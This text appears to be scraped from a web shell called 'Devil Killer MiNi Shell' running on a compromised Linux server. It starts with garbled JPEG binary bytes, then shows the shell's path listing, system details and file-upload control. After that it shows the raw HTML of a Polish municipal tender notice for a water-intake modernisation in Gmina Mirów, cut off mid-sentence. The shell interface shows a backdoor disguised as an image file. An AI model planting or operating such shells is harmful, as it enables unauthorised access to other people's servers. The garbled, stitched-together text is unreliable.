JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230811/0035187001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rozbudowa oraz modernizacja gminnej sieci wodociągowej na terenie gminy Mirów /.../ Część II – Modernizacja gminnego<br/>ujęcia wody w miejscowości Mirówek” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIRÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mirów Stary 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mirów Stary</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-503</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 628 38 89</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@mirow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mirow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa oraz modernizacja gminnej sieci wodociągowej na terenie gminy Mirów /.../ Część II – Modernizacja gminnego<br/>ujęcia wody w miejscowości Mirówek” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-54be2f44-383b-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00351870</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00049114/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Rozbudowa oraz modernizacja gminnej sieci wodociągowej na terenie Gminy Mirów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gwmirow.e-zp.finn.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a<br/>Wykonawcami odbywała się za pośrednictwem Systemu E-Zamówienia Publiczne Gminy Mirów, (zwanego dalej Systemem e-ZP lub<br/>Systemem) dostępnego pod adresem<br/>https://gwmirow.e-zp.finn.pl/<br/>Wszelkie informacje dotyczące postępowania w tym zapytania i odpowiedzi dla Wykonawców, modyfikacje SWZ, ogłoszenie<br/>wyników itp. będą zamieszczane na Systemie e-ZP</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto w Systemie e-ZP.<br/>Zaleca się rejestrację konta w Systemie e-ZP na adres email wskazany w formularzu ofertowym.<br/>W Systemie E-ZP znajdują się także instrukcja dla Wykonawcy (Instrukcja obsługi Systemu FINN e-Zamówienia Publiczne) oraz<br/>filmy instruktażowe - prezentujące podstawowe czynności dokonywane przez Wykonawców za pomocą Systemu . Instrukcja<br/>dostępna jest pod adresem: https://pomoc.e-zp.finn.pl/<br/>Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych Systemu E-ZP:<br/>a. Format kodowania treści w obrębie Systemu - UTF8,<br/>b. Komunikacja pomiędzy przeglądarką Wykonawcy, a serwerem jest wykonywana przy użyciu bezpiecznego protokołu HTTPS,<br/>c. Oznaczeniem czasu odbioru danych przez System jest data oraz dokładny czas (hh:mm:ss) - czas lokalny serwera<br/>synchronizowany odpowiednim źródłem czasu.<br/>Wymagania techniczne związane z korzystaniem z Systemu:<br/>a. stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512 kb/s;<br/>b. zaktualizowana przeglądarka internetowa Chrome w wersji 77 i późniejsze lub Mozilla Firefox w wersji 63 i późniejsze;<br/>c. system operacyjny Microsoft Windows 7 i późniejsze lub Apple macOS 10.14 i późniejsze, dystrybucje systemu Linux.<br/>Złożenie oferty poprzez System e-ZP wymaga posiadania przez Wykonawcę kwalifikowanego podpisu elektronicznego lub podpisu<br/>osobistego lub podpisu zaufanego.<br/>Kwalifikowany podpis elektroniczny, wystawiony przez dostawcę kwalifikowanej usługi zaufania, będącego podmiotem świadczącym<br/>usługi certyfikacyjne – podpis elektroniczny, spełniające wymogi bezpieczeństwa określone w ustawie o usługach zaufania oraz<br/>identyfikacji elektronicznej<br/>Pliki można podpisać przed dołączeniem do systemy za pomocą zewnętrznych narzędzi do podpisu lub po dołączeniu do Systemu<br/>e-ZP przy pomocy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego .<br/>Korzystanie z wbudowanej w System e-ZP funkcjonalności składania podpisu elektronicznego (kwalifikowany podpis elektroniczny,<br/>podpis osobisty, profil zaufany, podpis zaufany) możliwe jest pod warunkiem, że system teleinformatyczny, z którego korzysta<br/>Wykonawca, wyposażony jest w jeden z poniższych komponentów:<br/>• wirtualna maszyna Java firmy Oracle w wersji co najmniej 1.8.0_221 (Java SE JRE 8 Update 221) z obsługą technologii Java Web<br/>Start (JavaWS) lub<br/>• wirtualna maszyna OpenJDK w wersji co najmniej 1.8.0_222<br/>z zainstalowanym rozszerzeniem IcedTea Web Start.<br/>Powyższe wymagania nie ograniczają możliwości korzystania przez Wykonawcę z zewnętrznego oprogramowania do składania<br/>podpisu elektronicznego, a. kwalifikowany podpis elektroniczny (dopuszczalne formaty podpisów: PaDES - format.pdf, XaDES -<br/>pozostałe formaty);<br/>b. podpis zaufany;<br/>c. podpis osobisty;<br/>Informacje, oświadczenia lub dokumenty, przekazywane w postępowaniu o udzielenie zamówienia, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków<br/>komunikacji elektronicznej<br/>Zamawiający zaleca składnie ww. plików w formacie .pdf.<br/>Maksymalny rozmiar przesyłanych plików złożenia oferty oraz wiadomości wynosi 150 MB;<br/>W zależności od formatu podpisu: Podpis kwalifikowany, podpis osobisty, podpis zaufany i jego typu (zewnętrzny, otaczający)<br/>Wykonawca dołącza do Systemu e-ZP uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny)<br/>lub dokument z podpisem (typ otaczający).<br/>Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu które Wykonawca zastrzeże jako tajemnicę<br/>przedsiębiorstwa, powinny zostać złożone w Systemie jako osobny dokument poprzez mechanizm dodawania dokumentów i<br/>określenia ich jako „Tajemnica przedsiębiorstwa”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest : Wójt Gminy Mirów, Mirów Stary 27, 26-503 Mirów Stary, tel/fax: 48 628 38<br/>89, e-mail: urzad@mirow.pl /nazwa i adres oraz dane kontaktowe zamawiającego/;<br/>2) z inspektorem ochrony danych osobowych kontaktować można się pod adresem e-mail: bodo.radom@gmail.com<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pod nazwą: „Rozbudowa oraz modernizacja gminnej sieci wodociągowej na terenie gminy Mirów<br/>w ramach instrumentu wsparcia zadań ważnych dla równomiernego rozwoju województwa mazowieckiego.<br/>Część II – Modernizacja gminnego ujęcia wody w miejscowości Mirówek”<br/>, prowadzonym w trybie podstawowym<br/>na podstawie art. 275 ust 1 pzp</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BG.271.17.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1429254,76 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ogólny zakres robót.<br/>Zakres robót obejmuje:<br/>– Budowę dwóch zbiorników retencyjnych o pojemności 100 m3 każdy.<br/>– Budowę szczelnego zbiornika odparowującego do awaryjnego opróżniania zbiorników retencyjnych.<br/>– Montaż szczelnego zbiornika na podchloryn – szczelnego zbiornika z kręgów betonowych o poj. 1 m3.<br/>– Wykonanie obudowy dwóch studni wraz z niwelacją terenu wokół studni.<br/>– Przebudowę budynku stacji obejmującą: wymianę posadzki w pomieszczeniu technologicznym na posadzkę przemysłową<br/>w jednym poziomie – bez podestów pod urządzenia, wykonanie ścianek działowych wydzielających pomieszczenia,<br/>zamurowanie otworu w ścianie zewnętrznej w pomieszczeniu nr 03, wykonanie otworu pod drzwi zewnętrzne w<br/>pomieszczeniu chloratora, wykonanie nadproża stalowe 2C i zamurowanie pozostałego otworu nad drzwiami, wykonanie<br/>elementów wykończeniowych – pomalowanie całego obiektu (wewnątrz), wykonanie glazury na ścianach do wysokości 2,0<br/>m w pomieszczeniu technologicznym, chloratora i wc, zasypanie kanału kablowego i wykonanie posadzki na nim jak na<br/>pozostałej części obiektu, montaż nowej technologii w budynku.<br/>– Demontaż istniejącej instalacji elektrycznej i montaż projektowanego okablowania.<br/>Wykonanie rurociągów od istniejących studni.<br/>Wykonanie rurociągów od nowych zbiorników retencyjnych do SUW.<br/>Istniejący stan zagospodarowania terenu.<br/>Budynek technologiczny.<br/>– Obszar będący przedmiotem inwestycji to teren zabudowany przedmiotowym budynkiem technologicznym, wiatą<br/>śmietnikową (zasiek), dwoma czynnymi studniami oraz towarzyszącą infrastrukturą techniczną zapewniającą prawidłowe<br/>funkcjonowanie obiektu zgodne z przeznaczeniem. Teren jest ogrodzony, wyposażony w bramę i furtkę. Powierzchnia<br/>objęta wnioskiem to 2 300,0 m2. Działka ma kształt czworokąta. Obszar przedmiotowej inwestycji położony jest na gruntach<br/>oznaczonych jako RVI czyli grunty rolne VI klasy bonitacyjnej. Teren inwestycji to obszar równinny, niezróżnicowany<br/>wysokościowo i zagospodarowany dla potrzeb funkcjonowania ujęcia wody. Powierzchnię biologicznie czynną działki<br/>stanowi głównie teren nieutwardzony, porośnięty zielenią niską w postaci traw. Utwardzenie terenu stanowi opaska<br/>betonowa od strony wejść do budynku.<br/>– W granicach terenu inwestycji zidentyfikowano drzewostan kolidujący z planowaną inwestycją. Są to dwa drzewa<br/>wymagające wycinki – wg odrębnego postępowania. Dostęp do działki bezpośrednio z drogi gminnej na działce nr ewid.<br/>159. W sąsiedztwie terenu opracowania znajdują się działki o zabudowie rozproszonej zabudowane budynkami mieszkalnymi i budynkami gospodarczymi. Od strony wschodniej działka graniczy z działką nr 159 będącą drogą dojazdową<br/>do terenu inwestycji. Działka objęta wnioskiem jest uzbrojona. Ujęcie wody wraz z budynkiem technologicznym jest<br/>obiektem działającym.<br/>– Budynki do rozbiórki.<br/>– Na terenie działki objętej wnioskiem znajduje się obiekt przeznaczone do rozbiórki – jest to istniejący zasiek po<br/>składowaniu żużlu.<br/>Projektowane zagospodarowanie terenu.<br/>Projektowane zagospodarowanie terenu obejmuje budowę dwóch zbiorników retencyjnych o poj. 100 m3, budowę<br/>szczelnego zbiornika odparowującego dla potrzeb awaryjnego opróżniania zbiorników retencyjnych , budowę zbiornika do<br/>neutralizacji podchlorynu z betonowych kręgów o poj. 1m3, usunięcie zbędnej istniejącej infrastruktury tj. rurociągów oraz<br/>budowę nowych rurociągów i usunięcie istniejących tras złącza kablowego i wykonanie nowych.<br/>Urządzenia budowlane związane z obiektami:<br/>– istniejące 2 studnie zasilające, do których zostaną zamontowane nowe obudowy,<br/>– projektowane 2 zbiorniki retencyjne o poj. 100 m3 każdy,<br/>– projektowany szczelny zbiornik odparowujący dla potrzeb awaryjnego opróżniania zbiorników retencyjnych,<br/>– projektowany szczelny zbiornik retencyjny na podchloryn wykonany z kręgów betonowych o pojemności 1m3 ,<br/>– projektowane rurociągi międzyobiektowe,<br/>– projektowana trasa złącza kablowego i zasilania.<br/>– Przewiduje się zainstalowanie następujących urządzeń:<br/>– pompy głębinowe w studniach o wydajności 28,8 m3/h każda pozostają bez zmian, na nich instalowana będzie<br/>projektowana obudowa,<br/>– zestaw hydroforowy,<br/>– wodomierz, armatura zaporowa,<br/>– szafa sterownicza,<br/>– dozownik podchlorynu sodu,<br/>– zbiornik na podchloryn,<br/>– wykonanie rozdzielni technologicznej,<br/>– wykonanie zasilania pomp i zestawu hydroforowego,<br/>– wykonanie instalacji do urządzeń technologicznych wykonanie rurociągów od istniejących studni nr 1 i 2 do budynku<br/>technologicznego i między budynkiem technologicznym a zbiornikami retencyjnymi – z rur polietylenowych Φ160 PE100PN0<br/>– wykonanie rurociągów ssawnych od zbiorników retencyjnych do budynku technologicznego – z rur Φ160 PE100PN0,<br/>– Wykonanie przyłącza do gminnej sieci wodociągowej – z rur o średnicy Φ200 PE100PN10,<br/>– Wykonanie hydrantu p.poż. na przyłączu wodociągowym.<br/>Sposób odprowadzania lub oczyszczania ścieków:<br/>– Woda ze zbiorników retencyjny w przypadku awarii będzie odprowadzana do projektowanego awaryjnego zbiornika<br/>odparowującego. Zbiornik jest szczelny i wykorzystywany tylko w przypadku awarii.<br/>– Ścieki sanitarne odprowadzane będą do istniejącego zbiornika na szambo.<br/>– W przypadku wycieku podchlorynu sodu zostanie on odprowadzony do szczelnego zbiornika retencyjnego na podchloryn,<br/>a następnie odbierane przez wyspecjalizowanego obiorcę podchlorynu sodu.<br/>Układ komunikacyjny:<br/>– Układ komunikacyjny wg projekty zagospodarowania terenu załączony w części graficznej. Zapewniony jest dojazd na<br/>działkę poprzez istniejący zjazd – bez zmian. Projektowane chodniki i dojazdy zaprojektowano z kostki brukowej.<br/>Zapewniają one dojścia do elementów infrastruktury związanych z technologią związaną z działaniem ujęcia wody. Chodniki<br/>prowadzą od furtki do budynku technologicznego, do istniejących studni głębinowych. Całość komunikacji zaprojektowano z<br/>kostki brukowej 8 cm na podbudowie z suchego betonu, obwodowo zakończono krawężnikami i obrzeżami betonowymi.<br/>– Sposób dostępu do drogi publicznej:<br/>– Obsługa komunikacyjna z drogi gminnej - istniejącym zjazdem – bez zmian.<br/>Parametry techniczne sieci i urządzeń uzbrojenia terenu:<br/>– W studniach zamontowane zostaną pompy głębinowe o mocy 13kW każda. Wydajność każdej studni wynosi 59 m3/h.<br/>Wydajność ujęcia wynosi 100 m3/h.<br/>– Przewody wodociągowe zaprojektowano z rur polietylenowych PE100PN10.<br/>Przewody kanalizacyjne z rur PVC Sn8 łączone złączami kielichowymi uszczelnionymi uszczelkami gumowymi tak, by<br/>zabezpieczyć system przed infiltracją wód gruntowych. Studzienki rewizyjne zaprojektowano z kręgów betonowych,<br/>połączenia między kręgami należy uszczelnić uszczelkami gumowymi.<br/>Obsługa w zakresie uzbrojenia technicznego:<br/>– zaopatrzenie w wodę – z własnego ujęcia wody (studnia głębinowa),<br/>– odprowadzenie ścieków bytowych – do istniejącego szamba poprzez istniejące przyłącze kanalizacji sanitarnej,<br/>– zaopatrzenie w energię elektryczną – z istniejącej sieci elektroenergetycznej na warunkach dysponenta sieci, istniejące<br/>uzbrojenie zostanie usunięte, projektowane są nowe trasy wewnętrznej linii zasilającej zgodnie z rysunkiem<br/>zagospodarowania terenu i projektu technicznego,<br/>– zaopatrzenie w ciepło – ogrzewanie elektryczne,<br/>– odprowadzenie wód opadowych – na teren własny inwestycji, bez możliwości zalewania terenów sąsiednich działek,<br/>– odpady bytowo – gospodarcze będą gromadzone do pojemników z zapewnieniem wywozu na zorganizowane wysypisko<br/>zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach /Dz. U. z 2013 r. poz. 21 z późn. zmianami/.<br/>– odpady technologiczne – gromadzone w szczelnym zbiorniku i wywożone przez uprawnionych odbiorców na podstawie<br/>umowy z gminą.<br/>Ukształtowanie terenu i układ zieleni:<br/>– Ukształtowanie terenu nie ulegnie znaczącym zmianom, że względu na to, iż projektowane obiekty stanowią uzupełnienie<br/>istniejącej funkcji budynku. Zatem projektowane utwardzenie zostało zaprojektowane tak, by nie zalewać działek sąsiednich<br/>i dowiązać się do istniejącego budynku.<br/>– Nasypy występujące wokół studni zostaną zniwelowane do poziomu terenu i wyposażone w nowe ocieplane osłony studni.<br/>– Istniejący teren zielony – bez zmian. Po wykonaniu prac należy doprowadzić go do stanu pierwotnego i obsiać trawą. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45252126-7 - Roboty budowlane w zakresie zakładów uzdatniania wody pitnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45255110-3 - Roboty budowlane w zakresie studni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W trakcie oceny ofert kolejno porównywanym i ocenianym ofertom przyznawane są punkty za poszczególne kryteria</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Doświadczenie zawodowe.<br/>Wykonawca winien wykazać, że wykonał należycie nie wcześniej niż w okresie 5 lat przed upływem terminu składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 robotę budowlaną polegającą na budowie<br/>lub rozbudowie ujęcia wody i stacji uzdatniania wody pitnej o wartości, co najmniej 1.000.000,00 (słownie: jednego miliona<br/>00/100) złotych brutto, o 